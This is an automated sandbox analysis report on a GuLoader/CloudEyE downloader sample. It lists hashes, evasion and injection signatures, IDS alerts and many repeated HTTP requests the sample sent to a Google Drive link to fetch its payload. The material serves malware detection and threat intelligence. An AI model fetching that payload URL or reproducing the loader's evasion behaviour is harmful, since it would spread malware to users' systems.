Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEC-SPC-94.03.60.175.07.exe

Overview

General Information

Sample name:TEC-SPC-94.03.60.175.07.exe
Analysis ID:1576272
MD5:01b2b1469623862352f36c9a1d2ca1d5
SHA1:297d178ed13293b4ca95c731c08bef11266c4998
SHA256:72a691eae6f31fd6db1c1a5453ac5aad4b8b85d2747c5e668e761eb2e010d02a
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • TEC-SPC-94.03.60.175.07.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe" MD5: 01B2B1469623862352F36C9A1D2CA1D5)
    • TEC-SPC-94.03.60.175.07.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe" MD5: 01B2B1469623862352F36C9A1D2CA1D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3502635941.0000000003614000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.2354906620.0000000006A84000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-16T17:57:36.239478+010028032702Potentially Bad Traffic192.168.2.649776172.217.19.174443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: TEC-SPC-94.03.60.175.07.exeReversingLabs: Detection: 57%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49820 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49843 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49880 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49909 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49920 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49937 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49966 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50030 version: TLS 1.2
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49776 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
